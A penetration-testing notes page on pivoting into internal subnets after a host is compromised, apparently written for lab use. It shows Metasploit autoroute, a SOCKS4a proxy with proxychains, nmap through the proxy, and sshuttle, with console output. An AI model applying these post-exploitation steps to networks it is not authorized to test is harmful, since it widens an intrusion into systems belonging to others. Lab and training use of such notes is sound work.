Port Forwarding

Pivoting with Metasploit

Four steps, after a shell on a remote host has been obtained:

  1. autoroute from meterpreter

  2. socks proxy from msfconsole

  3. modify /etc/proxychains.conf

  4. proxychains

Step 1

From a meterpreter session on compromised machine:

meterpreter > run autoroute -s 172.16.2.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.16.2.0/255.255.255.0...
[+] Added route to 172.16.2.0/255.255.255.0 via 10.10.110.3
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   172.16.2.0         255.255.255.0      Session 4

In the above instance, the compromised machine is 172.16.1.20. We are trying to navigate to the 172.16.2.0/24 subnet. Note that the compromised machine is in the 172.16.1.0/24 subnet.

Step 2

Background the meterpreter session and use module:

use auxiliary/server/socks4a

Set SVCHost to your (attacking) IP address

meterpreter > background
[*] Backgrounding session 4...
msf5 exploit(windows/smb/psexec) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > show options

Module options (auxiliary/server/socks4a):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run SOCKS4a proxy


msf5 auxiliary(server/socks4a) > set SRVHOST 10.10.14.6
SRVHOST => 10.10.14.6
msf5 auxiliary(server/socks4a) > run

Step 3

Modify /etc/proxychains.conf so that socks4 points to your IP address, as specified by the SVCHost in metasploit.

#socks4 	127.0.0.1 9050
socks4 10.10.14.6 1080

# In this example, 10.10.14.6 is the IP of the Kali machine.

Step 4

Run nmap (or other tools) with proxychains

proxychains nmap 172.16.2.101

Pivoting with SShuttle

SShuttle creates an easy-to-use vpn-like connection for pivoting across networks. Our format is like this:

# sshuttle -vr USER@PIVOT_IP_ADDRESS NETWORK/CIDR

sshuttle -vr user@10.10.110.162 172.16.3.0/24
PreviousSSH Local Port ForwardingNextInitial Enumeration

Last updated

Was this helpful?